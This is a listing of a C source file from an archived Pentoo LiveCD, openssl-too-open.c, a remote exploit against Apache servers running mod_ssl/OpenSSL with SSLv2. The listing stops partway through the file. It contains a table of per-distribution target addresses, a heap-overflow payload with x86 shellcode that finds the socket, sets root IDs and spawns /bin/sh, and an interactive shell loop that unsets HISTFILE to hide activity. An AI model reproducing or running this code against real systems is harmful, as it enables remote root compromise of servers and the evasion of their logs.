home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / apache / openssl-too-open.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  27KB  |  976 lines

  1. /*
  2.  * openssl-too-open.c - OpenSSL remote apache exploit
  3.  *
  4.  * by Solar Eclipse <solareclipse@phreedom.org>
  5.  *
  6.  * Compile with: gcc -o openssl-too-open openssl-too-open.c -lcrypto
  7.  *
  8.  * Private 0dd code.
  9.  * Supplied by Kero@EFNET
  10.  *
  11.  */
  12.  
  13. #include <arpa/inet.h>
  14. #include <netinet/in.h>
  15. #include <sys/types.h>
  16. #include <sys/socket.h>
  17. #include <netdb.h>
  18. #include <errno.h>
  19. #include <string.h>
  20. #include <stdio.h>
  21. #include <unistd.h>
  22.  
  23. #include <openssl/ssl.h>  //ssl.h
  24. #include <openssl/rsa.h>  //rsa.h
  25. #include <openssl/x509.h> //x509.h
  26. #include <openssl/evp.h>  //evp.h
  27.  
  28. /* update this if you add architectures */
  29. #define MAX_ARCH 21
  30.  
  31. struct archs {
  32.     char* desc;
  33.     int func_addr;    /* objdump -R /usr/sbin/apache | grep free */
  34. } architectures[] = {
  35.     {
  36.         "Gentoo",
  37.         0x08086c34
  38.     },
  39.     {
  40.         "Debian GNU/Linux 3.0 (Woody) apache-1.3.26-1",
  41.         0x080863cc
  42.     },
  43. /*
  44. Change BUFSIZE to 16384, some servers respond back with huge
  45. SSL2 SERVER HELLO's. The default RH72 server sends back 1083 or
  46. something, so the old max size of 1024 will cause the exploit to exit.
  47.  
  48. RedHat targets, I will dig up SuSE/Mandrake/etc next.
  49. */
  50.  
  51. {
  52.     "RedHat Linux 6.0 (apache-1.3.6-7)",
  53.     0x080707ec
  54. },
  55. {
  56.     "RedHat Linux 6.1 (apache-1.3.9-4)",
  57.     0x0808ccc4
  58. },
  59. {
  60.     "RedHat Linux 6.2 (apache-1.3.12-2)",
  61.     0x0808f614
  62. },
  63. {
  64.     "RedHat Linux 7.0 (apache-1.3.12-25)",
  65.     0x0809251c
  66. },
  67. {
  68.     "RedHat Linux 7.1 (apache-1.3.19-5)",
  69.     0x0809af8c
  70.     { "RedHat Linux 7.x        (apache-1.3.14)",0x0808fd98 },
  71.  
  72. },
  73. {
  74.     "RedHat Linux 7.2 (apache-1.3.20-16)",
  75.     0x080994d4
  76. },
  77. {
  78.     "RedHat Linux 7.2 (apache 1.3.26-src)",
  79.     0x08161c14
  80. },
  81. {
  82.     "RedHat Linux 7.3 (apache-1.3.23-11)",
  83.     0x0808528c
  84. },
  85. {
  86.     "SuSE Linux 7.0 (apache-1.3.12)",
  87.     0x0809f54c
  88. },
  89. {
  90.     "SuSE Linux 7.1 (apache-1.3.17)",
  91.     0x08099984
  92. },
  93. {
  94.     "SuSE Linux 7.2 (apache-1.3.19)",
  95.     0x08099ec8
  96. },
  97. {
  98.     "SuSE Linux 7.3 (apache-1.3.20)",
  99.     0x08099da8
  100. },
  101. {
  102.     "SuSE Linux 8.0 (apache-1.3.23)",
  103.     0x08086168
  104. },
  105. {
  106.     "SuSE Linux 8.0 (apache-1.3.23) second",
  107.     0x080861c8
  108. },
  109. {
  110.     "Mandrake Linux 7.1 (apache-1.3.14-2)",
  111.     0x0809d6c4
  112. },
  113. {
  114.     "Mandrake Linux 8.0 (apache-1.3.19-3)",
  115.     0x0809ea98
  116. },
  117. {
  118.     "Mandrake Linux 8.1 (apache-1.3.20-3)",
  119.     0x0809e97c
  120. },
  121. {
  122.     "Mandrake Linux 8.2 (apache-1.3.23-4)",
  123.     0x08086580
  124. },
  125. {
  126.     "Slackware 7.1 (apache-1.3.26)",
  127.     0x083d37fc
  128. },
  129. {
  130.     "Slackware 8.1 (apache-1.3.26)",
  131.     0x080b2100
  132. }
  133. };
  134.  
  135. extern int errno;
  136.  
  137. int cipher;
  138. int ciphers;
  139.  
  140. /* the offset of the local port from be beginning of the overwrite next chunk
  141. buffer */
  142. #define FINDSCKPORTOFS     208 + 12 + 46
  143.  
  144. unsigned char overwrite_session_id_length[] =
  145.     "AAAA"                                /* int master key length; */
  146.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"    /* unsigned char master key[SSL MAX MASTER KEY LENGTH];    */
  147.     "\x70\x00\x00\x00";                    /* unsigned int session id length; */
  148.  
  149. unsigned char overwrite_next_chunk[] =
  150.     "AAAA"                                /* int master key length; */
  151.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"    /* unsigned char master key[SSL MAX MASTER KEY LENGTH];    */
  152.     "AAAA"                                /* unsigned int session id length; */
  153.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"    /* unsigned char session id[SSL MAX SSLSESSION ID LENGTH]; */
  154.     "AAAA"                                /* unsigned int sid ctx length; */
  155.     "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"    /* unsigned char sid ctx[SSL MAX SID CTXLENGTH]; */
  156.     "AAAA"                                /* int not resumable; */
  157.     "\x00\x00\x00\x00"                    /* struct sess cert st *sess cert; */
  158.     "\x00\x00\x00\x00"                    /* X509 *peer; */
  159.     "AAAA"                                /* long verify result; */
  160.     "\x01\x00\x00\x00"                    /* int references; */
  161.     "AAAA"                                /* int timeout; */
  162.     "AAAA"                                /* int time */
  163.     "AAAA"                                /* int compress meth; */
  164.     "\x00\x00\x00\x00"                    /* SSL CIPHER *cipher; */
  165.     "AAAA"                                /* unsigned long cipher id; */
  166.     "\x00\x00\x00\x00"                    /* STACK OF(SSL CIPHER) *ciphers; */
  167.     "\x00\x00\x00\x00\x00\x00\x00\x00"    /* CRYPTO EX DATA ex data; */
  168.     "AAAAAAAA"                            /* struct ssl session st *prev,*next; */
  169.  
  170.     "\x00\x00\x00\x00"                    /* Size of previous chunk */
  171.     "\x11\x00\x00\x00"                    /* Size of chunk, in bytes */
  172.     "fdfd"                                /* Forward and back pointers */
  173.     "bkbk"
  174.     "\x10\x00\x00\x00"                    /* Size of previous chunk */
  175.     "\x10\x00\x00\x00"                    /* Size of chunk, PREV INUSE is set */
  176.  
  177. /* shellcode start */
  178.     "\xeb\x0a\x90\x90"    /* jump 10 bytes ahead, land at shellcode */
  179.     "\x90\x90\x90\x90"
  180.     "\x90\x90\x90\x90"    /* this is overwritten with FD by the unlink macro */
  181.  
  182. /* 72 bytes findsckcode by LSD-pl */
  183.     "\x31\xdb"             /* xorl    %ebx,%ebx              */
  184.     "\x89\xe7"             /* movl    %esp,%edi              */
  185.     "\x8d\x77\x10"         /* leal    0x10(%edi),%esi        */
  186.     "\x89\x77\x04"         /* movl    %esi,0x4(%edi)         */
  187.     "\x8d\x4f\x20"         /* leal    0x20(%edi),%ecx        */
  188.     "\x89\x4f\x08"         /* movl    %ecx,0x8(%edi)         */
  189.     "\xb3\x10"             /* movb    $0x10,%bl              */
  190.     "\x89\x19"             /* movl    %ebx,(%ecx)            */
  191.     "\x31\xc9"             /* xorl    %ecx,%ecx              */
  192.     "\xb1\xff"             /* movb    $0xff,%cl              */
  193.     "\x89\x0f"             /* movl    %ecx,(%edi)            */
  194.     "\x51"                 /* pushl   %ecx                   */
  195.     "\x31\xc0"             /* xorl    %eax,%eax              */
  196.     "\xb0\x66"             /* movb    $0x66,%al              */
  197.     "\xb3\x07"             /* movb    $0x07,%bl              */
  198.     "\x89\xf9"             /* movl    %edi,%ecx              */
  199.     "\xcd\x80"             /* int     $0x80                  */
  200.     "\x59"                 /* popl    %ecx                   */
  201.     "\x31\xdb"             /* xorl    %ebx,%ebx              */
  202.     "\x39\xd8"             /* cmpl    %ebx,%eax              */
  203.     "\x75\x0a"             /* jne     <findsckcode+54>       */
  204.     "\x66\xb8\x12\x34"     /* movw    $0x1234,%bx            */
  205.     "\x66\x39\x46\x02"     /* cmpw    %bx,0x2(%esi)          */
  206.     "\x74\x02"             /* je      <findsckcode+56>       */
  207.     "\xe2\xe0"             /* loop    <findsckcode+24>       */
  208.     "\x89\xcb"             /* movl    %ecx,%ebx              */
  209.     "\x31\xc9"             /* xorl    %ecx,%ecx              */
  210.     "\xb1\x03"             /* movb    $0x03,%cl              */
  211.     "\x31\xc0"             /* xorl    %eax,%eax              */
  212.     "\xb0\x3f"             /* movb    $0x3f,%al              */
  213.     "\x49"                 /* decl    %ecx                   */
  214.     "\xcd\x80"             /* int     $0x80                  */
  215.     "\x41"                 /* incl    %ecx                   */
  216.     "\xe2\xf6"             /* loop    <findsckcode+62>       */
  217.  
  218. /* 10 byte setresuid(0,0,0); by core */
  219.     "\x31\xc9"       /* xor    %ecx,%ecx */
  220.     "\xf7\xe1"       /* mul    %ecx,%eax */
  221.     "\x51"           /* push   %ecx */
  222.     "\x5b"           /* pop    %ebx */
  223.     "\xb0\xa4"       /* mov    $0xa4,%al */
  224.     "\xcd\x80"       /* int    $0x80 */
  225.  
  226. /* 24 bytes execl("/bin/sh", "/bin/sh", 0); by LSD-pl */
  227.     "\x31\xc0"             /* xorl    %eax,%eax              */
  228.     "\x50"                 /* pushl   %eax                   */
  229.     "\x68""//sh"           /* pushl   $0x68732f2f            */
  230.     "\x68""/bin"           /* pushl   $0x6e69622f            */
  231.     "\x89\xe3"             /* movl    %esp,%ebx              */
  232.     "\x50"                 /* pushl   %eax                   */
  233.     "\x53"                 /* pushl   %ebx                   */
  234.     "\x89\xe1"             /* movl    %esp,%ecx              */
  235.     "\x99"                 /* cdql                           */
  236.     "\xb0\x0b"             /* movb    $0x0b,%al              */
  237.     "\xcd\x80";             /* int     $0x80                  */
  238.  
  239. /* read and write buffer */
  240. #define BUFSIZE 16384
  241.  
  242. /* hardcoded protocol stuff */
  243. #define CHALLENGE_LENGTH 16
  244. #define RC4_KEY_LENGTH 16    /* 128 bits */
  245. #define RC4_KEY_MATERIAL_LENGTH (RC4_KEY_LENGTH*2)
  246.  
  247. /* straight from the openssl source */
  248. #define n2s(c,s)    ((s=(((unsigned int)(c[0]))<< 8)| (((unsigned int)(c[1]))   )),c+=2)
  249. #define s2n(s,c)    ((c[0]=(unsigned char)(((s)>> 8)&0xff), c[1]=(unsigned char)(((s)    )&0xff)),c+=2)
  250.  
  251. /* we keep all SSL2 state in this structure */
  252. typedef struct {
  253.     int sock;
  254.  
  255.     /* client stuff */
  256.     unsigned char challenge[CHALLENGE_LENGTH];
  257.     unsigned char master_key[RC4_KEY_LENGTH];
  258.     unsigned char key_material[RC4_KEY_MATERIAL_LENGTH];
  259.  
  260.     /* connection id - returned by the server */
  261.     int conn_id_length;
  262.     unsigned char conn_id[SSL2_MAX_CONNECTION_ID_LENGTH];
  263.  
  264.     /* server certificate */
  265.     X509 *x509;
  266.  
  267.     /* session keys */
  268.     unsigned char* read_key;
  269.     unsigned char* write_key;
  270.     RC4_KEY* rc4_read_key;
  271.     RC4_KEY* rc4_write_key;
  272.  
  273.     /* sequence numbers, used for MAC calculation */
  274.     int read_seq;
  275.     int write_seq;
  276.  
  277.     /* set to 1 when the SSL2 handshake is complete */
  278.     int encrypted;
  279. } ssl_conn;
  280.  
  281. #define COMMAND1 "TERM=xterm; export TERM=xterm; exec bash -i\n"
  282. #define COMMAND2 "unset HISTFILE; uname -a; id; w;\n"
  283.  
  284. long getip(char *hostname) {
  285.     struct hostent *he;
  286.     long ipaddr;
  287.     
  288.     if ((ipaddr = inet_addr(hostname)) < 0) {
  289.         if ((he = gethostbyname(hostname)) == NULL) {
  290.             perror("gethostbyname()");
  291.             exit(-1);
  292.         }
  293.         memcpy(&ipaddr, he->h_addr, he->h_length);
  294.     }    
  295.     return ipaddr;
  296. }
  297.  
  298. /* mixter's code w/enhancements by core */
  299.  
  300. int sh(int sockfd) {
  301.    char snd[1024], rcv[1024];
  302.    fd_set rset;
  303.    int maxfd, n;
  304.  
  305.    /* Priming commands */
  306.    strcpy(snd, COMMAND1 "\n");
  307.    write(sockfd, snd, strlen(snd));
  308.  
  309.    strcpy(snd, COMMAND2 "\n");
  310.    write(sockfd, snd, strlen(snd));
  311.  
  312.    /* Main command loop */
  313.    for (;;) {
  314.       FD_SET(fileno(stdin), &rset);
  315.       FD_SET(sockfd, &rset);
  316.  
  317.       maxfd = ( ( fileno(stdin) > sockfd )?fileno(stdin):sockfd ) + 1;
  318.       select(maxfd, &rset, NULL, NULL, NULL);
  319.  
  320.       if (FD_ISSET(fileno(stdin), &rset)) {
  321.      bzero(snd, sizeof(snd));
  322.      fgets(snd, sizeof(snd)-2, stdin);
  323.      write(sockfd, snd, strlen(snd));
  324.       }
  325.  
  326.       if (FD_ISSET(sockfd, &rset)) {
  327.      bzero(rcv, sizeof(rcv));
  328.  
  329.      if ((n = read(sockfd, rcv, sizeof(rcv))) == 0) {
  330.         printf("Good Bye!\n");
  331.         return 0;
  332.      }
  333.  
  334.      if (n < 0) {
  335.         perror("read");
  336.         return 1;
  337.      }
  338.  
  339.      fputs(rcv, stdout);
  340.      fflush(stdout); /* keeps output nice */
  341.       }
  342.    } /* for(;;) */
  343. }
  344.  
  345. /* Returns the local port of a connected socket */
  346. int get_local_port(int sock)
  347. {
  348.     struct sockaddr_in s_in;
  349.     unsigned int namelen = sizeof(s_in);
  350.  
  351.     if (getsockname(sock, (struct sockaddr *)&s_in, &namelen) < 0) {
  352.         printf("Can't get local port: %s\n", strerror(errno));
  353.         exit(1);
  354.     }
  355.  
  356.     return s_in.sin_port;
  357. }
  358.  
  359. /* Connect to a host */
  360. int connect_host(char* host, int port)
  361. {
  362.     struct sockaddr_in s_in;
  363.     int sock;
  364.  
  365.     s_in.sin_family = AF_INET;
  366.     s_in.sin_addr.s_addr = getip(host);
  367.     s_in.sin_port = htons(port);
  368.  
  369.     if ((sock = socket(AF_INET, SOCK_STREAM, 0)) <= 0) {
  370.         printf("Could not create a socket\n");
  371.         exit(1);
  372.     }
  373.  
  374.     if (connect(sock, (struct sockaddr *)&s_in, sizeof(s_in)) < 0) {
  375.         printf("Connection to %s:%d failed: %s\n", host, port, strerror(errno));
  376.         exit(1);
  377.     }
  378.  
  379.     return sock;
  380. }
  381.  
  382. /* Create a new ssl conn structure and connect to a host */
  383. ssl_conn* ssl_connect_host(char* host, int port)
  384. {
  385.     ssl_conn* ssl;
  386.  
  387.     if (!(ssl = (ssl_conn*) malloc(sizeof(ssl_conn)))) {
  388.         printf("Can't allocate memory\n");
  389.         exit(1);
  390.     }
  391.  
  392.     /* Initialize some values */
  393.     ssl->encrypted = 0;
  394.     ssl->write_seq = 0;
  395.     ssl->read_seq = 0;
  396.  
  397.     ssl->sock = connect_host(host, port);
  398.  
  399.     return ssl;
  400. }
  401.  
  402. /* global buffer used by the ssl result() */
  403. char res_buf[30];
  404.  
  405. /* converts an SSL error code to a string */
  406. char* ssl_error(int code) {
  407.     switch (code) {
  408.         case 0x00:    return "SSL2 PE UNDEFINED ERROR (0x00)";
  409.         case 0x01:    return "SSL2 PE NO CIPHER (0x01)";
  410.         case 0x02:    return "SSL2 PE NO CERTIFICATE (0x02)";
  411.         case 0x04:    return "SSL2 PE BAD CERTIFICATE (0x03)";
  412.         case 0x06:    return "SSL2 PE UNSUPPORTED CERTIFICATE TYPE (0x06)";
  413.     default:
  414.         sprintf(res_buf, "%02x", code);
  415.         return res_buf;
  416.     }
  417. }
  418.  
  419. /* read len bytes from a socket. boring. */
  420. int read_data(int sock, unsigned char* buf, int len)
  421. {
  422.     int l;
  423.     int to_read = len;
  424.  
  425.     do {
  426.         if ((l = read(sock, buf, to_read)) < 0) {
  427.             printf("Error in read: %s\n", strerror(errno));
  428.             exit(1);
  429.         }
  430.         to_read -= len;
  431.     } while (to_read > 0);
  432.  
  433.     return len;
  434. }
  435.  
  436. /* reads an SSL packet and decrypts it if necessery */
  437. int read_ssl_packet(ssl_conn* ssl, unsigned char* buf, int buf_size)
  438. {
  439.     int rec_len, padding;
  440.  
  441.     read_data(ssl->sock, buf, 2);
  442.  
  443.     if ((buf[0] & 0x80) == 0) {
  444.         /* three byte header */
  445.         rec_len = ((buf[0] & 0x3f) << 8) | buf[1];
  446.         read_data(ssl->sock, &buf[2], 1);
  447.         padding = (int)buf[2];
  448.     }
  449.     else {
  450.         /* two byte header */
  451.         rec_len = ((buf[0] & 0x7f) << 8) | buf[1];
  452.         padding = 0;
  453.     }
  454.  
  455.     if ((rec_len <= 0) || (rec_len > buf_size)) {
  456.         printf("read_ssl_packet: Record length out of range (rec_len = %d)\n",rec_len); 
  457.         exit(1);
  458.     }
  459.  
  460.     read_data(ssl->sock, buf, rec_len);
  461.  
  462.     if (ssl->encrypted) {
  463.         if (MD5_DIGEST_LENGTH + padding >= rec_len) {
  464.             if ((buf[0] == SSL2_MT_ERROR) && (rec_len == 3)) {
  465.                 /* the server didn't switch to encryption due to an error */
  466.                 return 0;
  467.             }
  468.             else {
  469.                 printf("read_ssl_packet: Encrypted message is too short (rec_len = %d)\n",rec_len);
  470.                 exit(1);
  471.             }
  472.         }
  473.  
  474.         /* decrypt the encrypted part of the packet */
  475.         RC4(ssl->rc4_read_key, rec_len, buf, buf);
  476.  
  477.         /* move the decrypted message in the beginning of the buffer */
  478.         rec_len = rec_len - MD5_DIGEST_LENGTH - padding;
  479.         memmove(buf, buf + MD5_DIGEST_LENGTH, rec_len);
  480.     }
  481.  
  482.     if (buf[0] == SSL2_MT_ERROR) {
  483.         if (rec_len != 3) {
  484.             printf("Malformed server error message\n");
  485.             exit(1);
  486.         }
  487.         else {
  488.             return 0;
  489.         }
  490.     }
  491.  
  492.     return rec_len;
  493. }
  494.  
  495. /* send an ssl packet, encrypting it if ssl->encrypted is set */
  496. void send_ssl_packet(ssl_conn* ssl, unsigned char* rec, int rec_len)
  497. {
  498.     unsigned char buf[BUFSIZE];
  499.     unsigned char* p;
  500.     int tot_len;
  501.     MD5_CTX ctx;
  502.     int seq;
  503.  
  504.  
  505.     if (ssl->encrypted)
  506.         tot_len = rec_len + MD5_DIGEST_LENGTH;    /* RC4 needs no padding */
  507.     else
  508.         tot_len = rec_len;
  509.  
  510.     if (2 + tot_len > BUFSIZE) {
  511.         printf("send_ssl_packet: Record length out of range (rec_len = %d)\n",rec_len);
  512.         exit(1);
  513.     }
  514.  
  515.     p = buf;
  516.     s2n(tot_len, p);
  517.  
  518.     buf[0] = buf[0] | 0x80;    /* two byte header */
  519.  
  520.     if (ssl->encrypted) {
  521.         /* calculate the MAC */
  522.         seq = ntohl(ssl->write_seq);
  523.  
  524.         MD5_Init(&ctx);
  525.         MD5_Update(&ctx, ssl->write_key, RC4_KEY_LENGTH);
  526.         MD5_Update(&ctx, rec, rec_len);
  527.         MD5_Update(&ctx, &seq, 4);
  528.         MD5_Final(p, &ctx);
  529.  
  530.         p+=MD5_DIGEST_LENGTH;
  531.  
  532.         memcpy(p, rec, rec_len);
  533.  
  534.         /* encrypt the payload */
  535.         RC4(ssl->rc4_write_key, tot_len, &buf[2], &buf[2]);
  536.  
  537.     }
  538.     else {
  539.         memcpy(p, rec, rec_len);
  540.     }
  541.  
  542.     send(ssl->sock, buf, 2 + tot_len, 0);
  543.  
  544.     /* the sequence number is incremented by both encrypted and plaintext packets*/
  545.     ssl->write_seq++;
  546. }
  547.  
  548. /* Send a CLIENT HELLO message to the server */
  549. void send_client_hello(ssl_conn *ssl)
  550. {
  551.     int i;
  552.     unsigned char buf[BUFSIZE] =
  553.         "\x01"            /* client hello msg */
  554.  
  555.         "\x00\x02"        /* client version */
  556.         "\x00\x18"        /* cipher specs length */
  557.         "\x00\x00"        /* session id length */
  558.         "\x00\x10"        /* challenge length */
  559.  
  560.         "\x07\x00\xc0\x05\x00\x80\x03\x00"    /* cipher specs data */
  561.         "\x80\x01\x00\x80\x08\x00\x80\x06"
  562.         "\x00\x40\x04\x00\x80\x02\x00\x80"
  563.  
  564.         "";                                    /* session id data */
  565.  
  566.     /* generate CHALLENGE LENGTH bytes of challenge data */
  567.     for (i = 0; i < CHALLENGE_LENGTH; i++) {
  568.         ssl->challenge[i] = (unsigned char) (rand() >> 24);
  569.     }
  570.     memcpy(&buf[33], ssl->challenge, CHALLENGE_LENGTH);
  571.  
  572.     send_ssl_packet(ssl, buf, 33 + CHALLENGE_LENGTH);
  573. }
  574.  
  575. /* Get a SERVER HELLO response from the server */
  576. void get_server_hello(ssl_conn* ssl)
  577. {
  578.     unsigned char buf[BUFSIZE];
  579.     unsigned char *p, *end;
  580.     int len;
  581.     int server_version, cert_length, cs_length, conn_id_length;
  582.     int found;
  583.  
  584.     if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
  585.         printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
  586.         exit(1);
  587.     }
  588.     if (len < 11) {
  589.         printf("get_server_hello: Packet too short (len = %d)\n", len);
  590.         exit(1);
  591.     }
  592.  
  593.     p = buf;
  594.  
  595.     if (*(p++) != SSL2_MT_SERVER_HELLO) {
  596.         printf("get_server_hello: Expected SSL2 MT SERVER HELLO, got %x\n",(int)p[-1]);
  597.         exit(1);
  598.     }
  599.  
  600.     if (*(p++) != 0) {
  601.         printf("get_server_hello: SESSION-ID-HIT is not 0\n");
  602.         exit(1);
  603.     }
  604.  
  605.     if (*(p++) != 1) {
  606.         printf("get_server_hello: CERTIFICATE-TYPE is not SSL CT X509CERTIFICATE\n");
  607.         exit(1);
  608.     }
  609.  
  610.     n2s(p, server_version);
  611.     if (server_version != 2) {
  612.         printf("get_server_hello: Unsupported server version %d\n", server_version);
  613.         exit(1);
  614.     }
  615.  
  616.     n2s(p, cert_length);
  617.     n2s(p, cs_length);
  618.     n2s(p, conn_id_length);
  619.  
  620.     if (len != 11 + cert_length + cs_length + conn_id_length) {
  621.         printf("get_server_hello: Malformed packet size\n");
  622.         exit(1);
  623.     }
  624.  
  625.     /* read the server certificate */
  626.     ssl->x509 = NULL;
  627.     ssl->x509=d2i_X509(NULL,&p,(long)cert_length);
  628.     if (ssl->x509 == NULL) {
  629.         printf("get server hello: Cannot parse x509 certificate\n");
  630.         exit(1);
  631.     }
  632.  
  633.     if (cs_length % 3 != 0) {
  634.         printf("get server hello: CIPHER-SPECS-LENGTH is not a multiple of 3\n");
  635.         exit(1);
  636.     }
  637.  
  638.     found = 0;
  639.     for (end=p+cs_length; p < end; p += 3) {
  640.         if ((p[0] == 0x01) && (p[1] == 0x00) && (p[2] == 0x80))
  641.             found = 1;    /* SSL CK RC4 128 WITH MD5 */
  642.     }
  643.  
  644.     if (!found) {
  645.         printf("get server hello: Remote server does not support 128 bit RC4\n");
  646.         exit(1);
  647.     }
  648.  
  649.     if (conn_id_length > SSL2_MAX_CONNECTION_ID_LENGTH) {
  650.         printf("get server hello: CONNECTION-ID-LENGTH is too long\n");
  651.         exit(1);
  652.     }
  653.  
  654.     /* The connection id is sent back to the server in the CLIENT FINISHED packet*/
  655.     ssl->conn_id_length = conn_id_length;
  656.     memcpy(ssl->conn_id, p, conn_id_length);
  657. }
  658.  
  659. /* Send a CLIENT MASTER KEY message to the server */
  660.  
  661. void send_client_master_key(ssl_conn* ssl, unsigned char* key_arg_overwrite,int key_arg_overwrite_len) {
  662.     int encrypted_key_length, key_arg_length, record_length;
  663.     unsigned char* p;
  664.     int i;
  665.     EVP_PKEY *pkey=NULL;
  666.  
  667.     unsigned char buf[BUFSIZE] =
  668.         "\x02"            /* client master key message */
  669.         "\x01\x00\x80"    /* cipher kind */
  670.         "\x00\x00"        /* clear key length */
  671.         "\x00\x40"        /* encrypted key length */
  672.         "\x00\x08";        /* key arg length */
  673.  
  674.     p = &buf[10];
  675.  
  676.     /* generate a 128 byte master key */
  677.     for (i = 0; i < RC4_KEY_LENGTH; i++) {
  678.         ssl->master_key[i] = (unsigned char) (rand() >> 24);
  679.     }
  680.  
  681.     pkey=X509_get_pubkey(ssl->x509);
  682.     if (!pkey) {
  683.         printf("send client master key: No public key in the server certificate\n");
  684.         exit(1);
  685.     }
  686.  
  687.     if (pkey->type != EVP_PKEY_RSA) {
  688.         printf("send client master key: The public key in the server certificate isnot a RSA key\n");
  689.         exit(1);
  690.     }
  691.  
  692.     /* Encrypt the client master key with the server public key and put it in thepacket */
  693.     encrypted_key_length = RSA_public_encrypt(RC4_KEY_LENGTH, ssl->master_key,&buf[10], pkey->pkey.rsa, RSA_PKCS1_PADDING);
  694.     if (encrypted_key_length <= 0) {
  695.         printf("send client master key: RSA encryption failure\n");
  696.         exit(1);
  697.     }
  698.  
  699.     p += encrypted_key_length;
  700.  
  701.     if (key_arg_overwrite) {
  702.         /* These 8 bytes fill the key arg array on the server */
  703.         for (i = 0; i < 8; i++) {
  704.             *(p++) = (unsigned char) (rand() >> 24);
  705.         }
  706.         /* This overwrites the data following the key arg array */
  707.         memcpy(p, key_arg_overwrite, key_arg_overwrite_len);
  708.  
  709.         key_arg_length = 8 + key_arg_overwrite_len;
  710.     }
  711.     else {
  712.         key_arg_length = 0;    /* RC4 doesn't use KEY-ARG */
  713.     }
  714.  
  715.     p = &buf[6];
  716.     s2n(encrypted_key_length, p);
  717.     s2n(key_arg_length, p);
  718.  
  719.     record_length = 10 + encrypted_key_length + key_arg_length;
  720.     send_ssl_packet(ssl, buf, record_length);
  721.  
  722.     /* all following messages should be encrypted */
  723.     ssl->encrypted = 1;
  724. }
  725.  
  726. /* Generate the key material using the algorithm described in the SSL2specification */
  727. void generate_key_material(ssl_conn* ssl)
  728. {
  729.     unsigned int i;
  730.     MD5_CTX ctx;
  731.     unsigned char *km;
  732.     unsigned char c='0';
  733.  
  734.     km=ssl->key_material;
  735.     for (i=0; i<RC4_KEY_MATERIAL_LENGTH; i+=MD5_DIGEST_LENGTH) {
  736.         MD5_Init(&ctx);
  737.  
  738.         MD5_Update(&ctx,ssl->master_key,RC4_KEY_LENGTH);
  739.         MD5_Update(&ctx,&c,1);
  740.         c++;
  741.         MD5_Update(&ctx,ssl->challenge,CHALLENGE_LENGTH);
  742.         MD5_Update(&ctx,ssl->conn_id, ssl->conn_id_length);
  743.         MD5_Final(km,&ctx);
  744.         km+=MD5_DIGEST_LENGTH;
  745.     }
  746. }
  747.  
  748. /* Generate the RC4 session read and write keys */
  749. void generate_session_keys(ssl_conn* ssl)
  750. {
  751.     generate_key_material(ssl);
  752.  
  753.     ssl->read_key = &(ssl->key_material[0]);
  754.     ssl->rc4_read_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
  755.     RC4_set_key(ssl->rc4_read_key, RC4_KEY_LENGTH, ssl->read_key);
  756.  
  757.     ssl->write_key = &(ssl->key_material[RC4_KEY_LENGTH]);
  758.     ssl->rc4_write_key = (RC4_KEY*) malloc(sizeof(RC4_KEY));
  759.     RC4_set_key(ssl->rc4_write_key, RC4_KEY_LENGTH, ssl->write_key);
  760. }
  761.  
  762. /* Get a SERVER VERIFY response from the server */
  763. void get_server_verify(ssl_conn* ssl)
  764. {
  765.     unsigned char buf[BUFSIZE];
  766.     int len;
  767.  
  768.     if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
  769.         printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
  770.         exit(1);
  771.     }
  772.     if (len != 1 + CHALLENGE_LENGTH) {
  773.         printf("get server verify: Malformed packet size\n");
  774.         exit(1);
  775.     }
  776.  
  777.     if (buf[0] != SSL2_MT_SERVER_VERIFY) {
  778.         printf("get server verify: Expected SSL2 MT SERVER VERIFY, got %x\n",(int)buf[0]);
  779.         exit(1);
  780.     }
  781.  
  782.     /* If this works, our decryption key is correct */
  783.     if (memcmp(ssl->challenge, &buf[1], CHALLENGE_LENGTH)) {
  784.         printf("get server verify: Challenge strings don't match\n");
  785.         exit(1);
  786.     }
  787. }
  788.  
  789. /* Send a CLIENT FINISHED message to the server */
  790. void send_client_finished(ssl_conn* ssl)
  791. {
  792.     unsigned char buf[BUFSIZE];
  793.  
  794.     buf[0] = SSL2_MT_CLIENT_FINISHED;
  795.     memcpy(&buf[1], ssl->conn_id, ssl->conn_id_length);
  796.  
  797.     send_ssl_packet(ssl, buf, 1+ssl->conn_id_length);
  798. }
  799.  
  800. /* Get a SERVER FINISHED message from the server */
  801. void get_server_finished(ssl_conn* ssl)
  802. {
  803.     unsigned char buf[BUFSIZE];
  804.     int len;
  805.     int i;
  806.  
  807.     if (!(len = read_ssl_packet(ssl, buf, sizeof(buf)))) {
  808.         printf("Server error: %s\n", ssl_error(ntohs(*(uint16_t*)&buf[1])));
  809.         exit(1);
  810.     }
  811.     if (buf[0] != SSL2_MT_SERVER_FINISHED) {
  812.         printf("get server finished: Expected SSL2 MT SERVER FINISHED, got %x\n",(int)buf[0]);
  813.         exit(1);
  814.     }
  815.  
  816.     if (len <= 112 /*17*/) {
  817.         printf("This server is not vulnerable to this attack.\n");
  818.         exit(1);
  819.     }
  820.  
  821.     printf("Session:\n");
  822.     printf("0000 - ");
  823.     for (i = 1; i < len; i++) {
  824.         printf("%02x ", (unsigned int)buf[i]);
  825.         if (i % 16 == 0) printf("\n%04x - ", i);
  826.     }
  827.     printf("\n");
  828.  
  829.     cipher = *(int*)&buf[101];
  830.     ciphers = *(int*)&buf[109];
  831.  
  832.     printf("cipher: 0x%x   ciphers: 0x%x\n", cipher, ciphers);
  833. }
  834.  
  835. void get_server_error(ssl_conn* ssl)
  836. {
  837.     unsigned char buf[BUFSIZE];
  838.     int len;
  839.  
  840.     if ((len = read_ssl_packet(ssl, buf, sizeof(buf))) > 0) {
  841.         printf("get server finished: Expected SSL2 MT ERROR, got %x\n", (int)buf[0]);
  842.         exit(1);
  843.     }
  844. }
  845.  
  846. void usage(char* argv0)
  847. {
  848.     int i;
